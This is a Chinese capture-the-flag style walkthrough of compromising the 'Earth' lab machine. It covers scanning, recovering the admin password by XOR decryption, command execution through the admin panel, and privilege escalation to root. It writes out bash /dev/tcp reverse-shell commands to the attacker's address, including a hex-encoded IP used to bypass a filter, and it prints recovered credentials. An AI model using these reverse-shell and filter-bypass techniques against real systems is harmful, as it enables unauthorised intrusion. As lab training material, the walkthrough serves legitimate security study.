kali攻击者ip:192.168.72.128
靶机ip162.168.72.147
1、先扫描主机名
2、探测此主机开放的端口服务
发现443端口有两个dns解析,在hosts添加dns解析
3、收集信息
①先访问一下earth.local域名,发现有之前的信息
扫描此域名下的目录
进入amdin目录看看,是个登录界面
②再去看另一个域名terratest.earth.local情况
探测web目录下有哪些
发现有两个目录可以访问,尝试看下robots.txt内容
发现有个testingnotes文件,但是不知道是何种格式,自己尝试测试发现是txt文件格式
翻译下内容如下
测试安全消息系统注意事项:
*使用XOR加密作为算法,应该是安全的RSA使用。
*地球已经确认他们收到了我们发送的信息。
*testdata.txt用于测试加密。
*terra被用作管理门户的用户名。
待办事项:
*我们如何将每月的密钥安全地发送到地球?或者我们应该每周换一次钥匙?
*需要测试不同长度的键来防止暴力。钥匙应该有多长?
*需要改进的消息界面和管理面板的界面,它目前是非常基本的。
从上面内容得到了一个信息,加密算法是xor,有个testdata.txt文件,用户名是terra
翻译// 根据辐射定年法和其他证据,地球形成于45亿年前。在地球历史的最初10亿年里,海洋中出现了生命,并开始影响地球的大气和表面,导致厌氧生物的激增,后来又出现了好氧生物。一些地质证据表明,生命可能早在41亿年前就出现了。
使用这个文件内容用xor加密方式与之前的消息运算。需要先将文件内容转化16进制再运算
16进制解密得到
用户名:terra 密码:earthclimatechangebad4humans 登录admin网页成功,可以执行命令
查找指定flag文件有哪些
查看此文本的内容,得到第一个flag
4、信息利用
使用反弹shell链接到靶机
bash -i >& /dev/tcp/192.168.72.128/77770>&1
反弹shell不成功。
发现是禁止远程链接,发现需要对ip地址进行16进制的转化绕过。
bash -i >& /dev/tcp/0xc0.0xa8.0x48.0x80/7777 0>&1
查看到攻击者拿到shell,链接成功。
5、进行信息提权
查看有哪些可以利用的权限
观察到有文件是root 尝试运行,发现报错
翻译为:检查是否存在重置触发器...重置失败,所有触发器都不存在。
本地没有调试命令,使用nc传送到本地调试一下
先给这个文件赋予执行的权限,再进行调试
在靶机上创建这三个文件
运行得到密码
切换root用户,输入密码
查看到flag